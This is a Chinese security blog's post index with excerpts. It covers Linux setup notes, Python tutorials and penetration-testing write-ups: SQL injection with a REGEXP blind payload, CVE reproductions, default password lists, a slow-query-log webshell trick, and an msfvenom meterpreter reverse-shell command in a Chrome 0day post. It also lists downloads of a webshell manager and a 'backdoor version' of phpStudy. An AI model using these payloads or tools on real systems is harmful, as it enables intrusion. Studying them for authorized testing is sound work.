自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(135)
  • 资源 (16)
  • 收藏
  • 关注

原创 Kali安装中文输入法

Kali版本:Kali-linux-2022.1-installer-amd641、换源并更新(此步骤可跳过)由于Kali刚刚安装完毕,首先对Kali换源,这里我使用的是阿里的源,也可使用其他源(国内较快源汇总)sudo vim /etc/apt/sources.list将此文件内内容改为deb https://mirrors.aliyun.com/kali kali-rolling main non-free contribdeb-src https://mirrors.aliyun.co.

2022-03-02 16:06:21 5107 4

原创 国内镜像源网站

企业源:阿里云开源镜像站:http://mirrors.aliyun.com/搜狐开源镜像站:http://mirrors.sohu.com/网易开源镜像站:http://mirrors.163.com/教育源:重庆大学:http://mirrors.cqu.edu.cn/北京理工大学:http://mirror.bit.edu.cn (IPv4 only)http://mirror.bit6.edu.cn (IPv6 only)北京交通大学:http://mirror.bjtu.e

2022-02-27 20:08:33 819

原创 闭包及最小依赖集解法

闭包求解算法对R<U , F>,求属性X(X ⊆ U)关于U上的函数依赖集F的闭包XF+输入:X,F输出:XF+步骤:令X0 =X,i =0;求MID,这里的 MID ={A| (∃V) (∃W) (V→W ∈ F ⋀ V ⊆Xi ⋀ A∈W ) }; 也就是说先令MID’ 为空集,对于F中的每一个函数依赖Y→Z,满足属性集Y⊆Xi ,那么MID’ =MID’ ∩ Z;最终的MID’ 即为所求的MIDXi+1 =MID∪Xi判断Xi+1 =Xi 是否相等若相等或Xi+1 =

2022-01-02 17:44:36 2903 1

原创 error while loading shared libraries: libcrypto.so.1.0.0: cannot open shared object file: No such fi

error while loading shared libraries: libcrypto.so.1.0.0: cannot openshared object file: No such file or directory解决方案:sudo apt-get install libssl1.0.0sudo apt-get install libssl1.0.0:i386

2021-07-09 13:53:07 1853

原创 Python3 协程

首发地址迭代是访问集合元素的一种方式。迭代器是一个可以记住遍历的位置的对象。迭代器对象从集合的第一个元素开始访问,直到所有元素被访问完结束。迭代器只能往前不会后退。判断是否可迭代In [1]: from collections.abc import IterableIn [2]: isinstance("abc",Iterable)Out[2]: TrueIn [3]: isinstance([1,2,3],Iterable)Out[3]: TrueIn [4]: isinstan

2021-07-02 16:24:53 109

原创 burp chrome抓包显示 您的连接不是私密连接

导入证书后依旧显示不是私密连接解决办法:Google chrome 访问chrome://flags/搜索Allow invalid certificates for resources loaded from localhost.然后开启此功能。

2021-06-22 10:16:21 1880 7

原创 Python3 多进程

什么是进程?程序:一个未运行的二进制文件,叫做程序。如Windows下的PE文件进程:二进制文件运行后,文件本身以及用到的资源称为进程,他是操作系统分配资源的基本单元。多任务:不止可以通过线程完成多任务,还可以通过进程完成多任务。使用Process实现多进程from multiprocessing import Processimport timedef test(test): time.sleep(5) print("这是{}".format(test))

2021-06-18 15:11:45 1316 1

原创 Python3 多线程

简单实现多线程import threadingimport timedef sing(sing): for i in range(5): print("---sing()---{}".format(sing)) time.sleep(1)def dance(dance): for i in range(5): print("---dance()---{}".format(dance)) time.sleep(1)

2021-06-18 15:10:36 108 1

原创 Python3 网络编程(使用Socket实现TCP、UDP通信)

TCP通信TCP_服务端 1 import socket as s 2 3 tcp = s.socket(s.AF_INET,s.SOCK_STREAM) 4 tcp.bind(('127.0.0.1', 6666)) 5 tcp.listen(5) 6 while True: 7 # 建立客户端连接 8 clientsocket,addr = tcp.accept() 9 print("连接地址: %s" % str(addr))10 m

2021-06-18 15:09:28 337

原创 PHP反序列化字符逃逸漏洞

0x01 漏洞原理原理:在一个序列x:x{xxxxx} 花括号的后面添加字符后不会改变本来反序列后的结果,因此可以精心构造序列化的属性,利用闭合关系改变本来题目的属性(或者说使后面的某些属性无效)0x02 复现环境PHP 5.4.45Apache 2.4.390x03 测试代码<?phphighlight_file(__FILE__);$flag='flag{xxx}';function filter($str){ return str_replace('secure','s

2021-06-10 15:13:49 233 5

原创 CVE-2020-27955 Git-LFS远程代码执行漏洞复现

0x01 漏洞简介Git LFS是Github开发的一个Git扩展,用于实现Git对大文件的支持。Windows平台上的Git-LFS版本<= 2.12上发现远程代码执行问题,一旦受害者克隆了恶意存储库并在其系统上运行了易受攻击的Git-LFS版本,就会立即执行有效载荷,漏洞编号为CVE-2020-27955。0x02 影响版本Git<=2.29.2、Git-LFS<=2.12,一些受影响的产品包括Git,GitHub CLI,GitHub Desktop,Visual Studio

2021-06-10 12:18:44 1250 13

原创 记一次MySQL5.7修改默认密码遇到的问题

sudo vim /etc/mysql/mysql.conf.d/mysqld.cnf修改配置文件,在[mysqld]中添加skip-grant-tables修改完毕后重启MySQL服务然后就可以免密登录MySQL命令行5.7版本前的mysql运行use mysql;update user set password=password("new_password") where user="root";flush privileges;quit;5.7版本后的mysql运行use my

2021-06-09 15:29:17 108

原创 Docker终止容器时报错

Got permission denied while trying to connect to the Docker daemon socket at unix:///var/run/docker.sock: Post http://%2Fvar%2Frun%2Fdocker.sock/v1.24/containers/af88/stop: dial unix /var/run/docker.sock: connect: permission deniedyd@yundao:~/null/信息搜集$ .

2021-06-07 14:18:15 413

原创 命令执行漏洞

命令执行漏洞是指应用有时需要调用一些执行系统命令的函数,如:system()、exec()、shell_exec()、eval()、passthru(),代码未对用户可控参数做过滤,当用户能控制这些函数中的参数时,就可以将恶意系统命令拼接到正常命令中,从而造成命令执行攻击。...

2021-06-02 13:29:50 213

原创 WSL2 请启用虚拟机平台 Windows 功能并确保在 BIOS 中启用虚拟化

Linbcdedit /set hypervisorlaunchtype auto

2021-06-02 09:45:37 596 5

原创 SQL注入漏洞学习文章索引

1、SQL注入靶场搭建2、SQL注入入门(联合注入)3、报错注入4、布尔盲注5、时间盲注6、利用SQL注入读写文件7、宽字节注入8、正则表达式注入9、MySQL绕过secure_file_priv利用慢查询写shell10、CTFHUB注入...

2021-05-27 16:06:39 126

原创 SQL注入靶场搭建

1、SQLi-Labs是什么?SQLi-Labs是一个专业的SQL注入练习平台。2、环境下载SQLi-Labs下载地址:https://github.com/Audi-1/sqli-labsPHPstudy下载地址:https://www.xp.cn/download.htmlphpStudy是一个PHP调试环境的程序集成包。恰好我们可以用到"PHP+Mysql+Apache"。3、环境搭建将下载的 SQLi-Labs.zip 解压到phpstudy网站根目录下设置为My

2021-05-27 15:37:16 548 2

原创 渗透测试完整流程(未完待续)

目录信息收集渗透测试流程图什么是渗透测试?渗透测试就是利用我们所掌握的网络安全知识,对目标网站进行一步一步的渗透,发现其中存在的漏洞和隐藏的风险,然后编写一篇测试报告,提供给我们的客户。客户根据测试报告,对网站进行漏洞修补,以防止被黑客的入侵服务器,造成不可估量的损失!开始一次渗透测试前,一定要确保我们的所有渗透测试目标,都已经拿到了客户的授权。如果没有拿到授权就对一个网站进行测试,《网络安全法》了解一下渗透测试可分为白盒测试和黑盒测试白盒测试:白盒测试就是客户给我们

2021-05-26 16:26:57 1631

原创 SQLMAP使用教程

用法:python sqlmap.py [选项]选项: -h, --help 显示基本帮助信息并退出 -hh 显示高级帮助信息并退出 --version 显示程序版本信息并退出 -v VERBOSE 输出信息详细程度级别:0-6(默认为 1) 目标: 至少提供一个以下选项以指定目标 -d DIRECT 直接连接数据库 -u URL,.

2021-05-26 16:20:45 1548 2

原创 Layer子域名爆破机使用教程

下载地址:传送门使用教程

2021-05-26 14:41:27 859

原创 subDomainBrute使用教程

安装下载到本地:https://github.com/lijiejie/subDomainsBrute使用

2021-05-26 14:30:59 2469

原创 渗透测试常见弱口令汇总

常见网络安全设备弱口令(默认口令)设备 默认账号 默认密码 深信服产品 sangfor sangfor sangfor@2018 sangfor@2019 深信服科技 AD dlanrecover 深信服负载均衡 AD 3.6 admin admin 深信服WAC ( WNS V2.6) admin admin 深信服VPN Admin Admin 深信服ipsec-VPN (SSL 5.5) Ad.

2021-05-26 14:07:02 2266

原创 渗透测试之信息搜集

1、渗透测试基本流程1、信息搜集主动信息收集:通过直接访问、扫描网站,这种流量将流经网站,能获取更多的信息,但是目标主机可能会记录你的操作记录。被动信息收集:利用第三方的服务对目标进行访问了解,比例:Google搜索、Shodan搜索、钟馗之眼等,你收集的信息会相对较少,但是你的行动并不会被目标主机发现。1、Google Hacking常用语法:逻辑与:and逻辑或:or 逻辑非:-完整匹配:"关键词" 通配符:* ?返回正文中含有关键字的网页 intext:寻找标题中

2021-05-26 10:45:32 953

原创 ValueError: check_hostname requires server_hostname

今天在写漏洞批量利用脚本的时候遇到一个问题,在使用requests库post数据时,报错ValueError: check_hostname requires server_hostname解决方法:关闭系统代理。

2021-05-18 18:52:45 546 3

原创 渗透测试之信息搜集

1、信息搜集主动信息收集:通过直接访问、扫描网站,这种流量将流经网站,能获取更多的信息,但是目标主机可能会记录你的操作记录。被动信息收集:利用第三方的服务对目标进行访问了解,比例:Google搜索、Shodan搜索、钟馗之眼等,你收集的信息会相对较少,但是你的行动并不会被目标主机发现。1、Google Hacking常用语法:逻辑与:and逻辑或:or 逻辑非:-完整匹配:"关键词" 通配符:* ?返回正文中含有关键字的网页 intext:寻找标题中含有关键字的网页 intitle:

2021-05-17 21:48:07 631

原创 Kindeditor上传漏洞复现(CVE-2017-1002024)

Kindeditor上传漏洞复现(CVE-2017-1002024)文章目录Kindeditor上传漏洞复现(CVE-2017-1002024)1. 漏洞简述2. 组件概述3. 漏洞原理4. 漏洞复现5. 漏洞验证5. 漏洞修复意见复现环境土豪专用下载链接https://download.csdn.net/download/qin9800/185108631. 漏洞简述漏洞名称:Kindeditor上传漏洞漏洞编号:CVE-2017-1002024漏洞影响:黑页、钓鱼、XSS等基础权限

2021-05-09 14:36:11 2968

原创 Ubuntu 18.04安装sshd遇到的问题

执行sudo apt-get install openssh-server报错下列软件包有未满足的依赖关系: openssh-server : 依赖: openssh-client (= 1:7.6p1-4) 依赖: openssh-sftp-server 但是它将不会被安装 推荐: ssh-import-id 但是它将不会被安装E: 无法修正错误,因为您要求某些软件包保持现状,就是它们破坏了软件包间的依赖关系根据报错,

2021-04-30 09:47:41 380

原创 MySQL绕过secure_file_priv利用慢查询写shell

通常情况下,找到一个注入点后,或者进入到一个网站的phpMyAdmin时,想通过into outfile写shell时,会通常会报错这是因为MySQL配置文件中的secure_file_priv的值默认为NULL。只有当他为非空值的时候才可以利用into outfile写文件。我们可以利用日志来进行写shell,然后利用文件包含漏洞来包含日志文件,从而拿到服务器一定的权限。利用慢查询来写shell1、设置slow_query_log=1.即启用慢查询日志(默认禁用)set global slow

2021-04-29 09:45:02 2425

原创 Microsoft IIS tilde directory enumeration POC

https://code.google.com/p/iis-shortname-scanner-poc/https://github.com/lijiejie/IIS_shortname_Scanner手工测试http://www.target.com/~1***/a.aspxhttp://www.target.com/l1j1e*~1****/a.aspx第一个为404,第二个为400说明存在此漏洞

2021-04-25 14:19:43 1415 2

原创 Apache ofbiz RMI远程代码执行漏洞复现(CVE-2021-26295)

OFBiz介绍OFBiz是一个非常著名的电子商务平台,是一个非常著名的开源项目,提供了创建基于最新J2EE/XML规范和技术标准,构建大中型企业级、跨平台、跨数据库、跨应用服务器的多层、分布式电子商务类WEB应用系统的框架。OFBiz最主要的特点是OFBiz提供了一整套的开发基于Java的web应用程序的组件和工具。包括实体引擎, 服务引擎, 消息引擎,工作流引擎, 规则引擎等,OFBiz 已经正式成为 Apache 的顶级项目: Apache OFBiz。影响版本apache:ofbiz:

2021-04-19 19:44:11 1173

原创 AWVS13.X安装

下载地址链接: https://pan.baidu.com/s/144ckWO2iq9uwVdA2kM45Ew 提取码: ikdw土豪专用链接:https://download.csdn.net/download/qin9800/16754932下一步下一步安装即可。破解过程:wvsc.exe 覆盖C:\Program Files(x86)\Acunetix\13.0.200205121目录下同名文件license_info.json覆盖C:\ProgramData\Acunetix\shar

2021-04-19 15:23:46 370

原创 Google Chrome 0day 远程代码执行漏洞复现

1.环境win10、win7均可2.关闭沙箱模式-no-sandbox3.chrome客户端需64位(Google Chrome < = 89.0.4389.114)使用命令关闭沙箱模式chrome.exe --no-sandboxPoc:https://github.com/r4j0x00/exploits/tree/master/chrome-0daymsfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.72.12

2021-04-18 16:16:51 651

原创 正则表达式注入(REGEXP注入)

应该场景就是盲注,原理就是直接查询自己需要的数据,然后通过正则表达式进行匹配,实用场景如下MySQL Payloadand 1=(SELECT 1 FROM information_schema.tables WHERE TABLE_SCHEMA="security" AND table_name REGEXP '^e' LIMIT 0,1) ‘^e[a-z]’ -> ‘^em[a-z]’ -> ‘^ema[a-z]’ -> ‘^emai[a-z]’-> ‘^email[

2021-04-14 16:05:35 1516

原创 常见危险端口服务及对应的漏洞

20:FTP服务的数据传输端口21:FTP服务的连接端口,可能存在 弱口令暴力破解22:SSH服务端口,可能存在 弱口令暴力破解23:Telnet端口,可能存在 弱口令暴力破解25:SMTP简单邮件传输协议端口,和 POP3 的110端口对应43:whois服务端口53:DNS服务端口(TCP/UDP 53)67/68:DHCP服务端口69:TFTP端口,可能存在弱口令80:HTTP端口,常见web漏洞88:Kerberos协议端口110:POP3邮件服务端口,和SMTP的25端口对

2021-04-14 09:53:51 2442 1

原创 渗透测试-Lampiao靶机渗透

1.环境部署靶机下载地址:https://download.vulnhub.com/lampiao/Lampiao.zip攻击机:Kali 2019靶机 : Lampiao目标:拿下靶机root权限和里面的flag2.信息搜集使用arp-scan -l进行局域网主机发现,确定目标靶机IP为192.168.72.132使用NMAP扫描目标靶机开发的端口nmap -sS -p 1-65535 192.168.72.132 -n 发现存在一个ssh服务,和2个web服务对两个web服务进

2021-04-13 16:00:17 493

原创 CVE-2015-1635,MS15-034 漏洞复现

靶机环境:Windows Server 2012 R2IIS 7下载链接:ed2k://|file|cn_windows_server_2012_x64_dvd_915588.iso|3826081792|6A56281311F9FE6973F66CF36E2F50BE|/激活密钥:J7TJK-NQPGQ-Q7VRH-G3B93-2WCQDPOC#coding=utf-8#CVE-2015-1635,MS15-034import requestsdef main(target):

2021-04-12 14:53:09 433

原创 CVE-2021-3156 复现

poc :https://github.com/xin02/CVE-2021-3156受影响版本:Sudo 1.8.2 – 1.8.31p2Sudo 1.9.0 – 1.9.5p1git clone https://github.com/blasty/CVE-2021-3156.gitcd CVE-2021-3156/make

2021-04-12 13:55:15 247

原创 Ubuntu 您必须启用main 组件

今天在使用Ubuntu 18.04 安装软件时,遇到一个问题sx@cm:~$ makeCommand 'make' not found, but can be installed with:sudo apt install make (您必须启用main 组件)sudo apt install make-guile尝试使用apt安装软件时一直提示您必须启用main 组件后来在软件和更新中勾选这个设置即可...

2021-04-12 13:33:57 2229

原创 error while loading shared libraries: libstdc++.so.6: cannot open shared object file: No such file o

sudo apt-get install lib32stdc++6

2021-04-09 15:20:04 986

原创 encryption【自解密程序逆向分析】

题目下载地址:传送门0x0 查壳0x1 拖入IDA中分析发现这里的汇编代码比较奇怪,猜测被加密了,通过交叉引用定位到解密函数直接通过OD动态调试,提取解密后的字节然后通过IDA Python脚本解密程序,解密完成后就可以F5查看伪代码了a = """55 8B EC 81 EC 30 01 00 00 A1 04 20 45 00 33 C5 89 45 FC 6A 64 8D 45 98 6A 00 50 E8 60 1C 00 00 68 FC 00 45 00 E8 C6 FD

2021-04-03 21:49:57 453

cknife Java开发的类菜刀工具,又名C刀

cknife Java开发的类菜刀工具,又名C刀

2022-02-27

Python3.6+Gmpy2

Python3.6+Gmpy2

2022-02-27

知道创宇网安知识图谱,网络安全学习路径

网络安全学习路径

2022-02-27

DirectX 电脑dll修复工具

DirectX 电脑dll修复工具

2022-02-27

Firefox火狐渗透测试版本(解压密码123).7z

Firefox火狐渗透测试版本(解压密码123).7z

2021-05-26

Netsparker.Pro.v5.8.1.28119

Netsparker.Pro.v5.8.1.28119

2021-04-19

PDF_编辑器.rar

PDF_编辑器.rar

2021-03-02

子域名爆破 Layer挖掘机

子域名爆破 Layer挖掘机

2021-03-02

burp插件hackbar+nc.rar

burp插件hackbar+nc.rar

2021-03-02

御剑后台扫描珍藏版.rar

御剑后台扫描珍藏版.rar

2021-03-02

IISPutScanner增强版.rar

IISPutScanner增强版.rar

2021-03-02

NC(NETCAT)

NC(NETCAT)

2021-02-24

seay+wsl2更新程序.rar

seay+wsl2更新程序.rar

2021-02-23

phpStudy 后门版.rar

phpStudy是一个PHP调试环境的程序集成包。该程序包集成最新的Apache+PHP+MySQL+phpMyAdmin+ZendOptimizer,一次性安装,无须配置即可使用,是非常方便、好用的PHP调试环境。该程序不仅包括PHP调试环境,还包括了开发工具、开发手册等。

2020-09-24

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除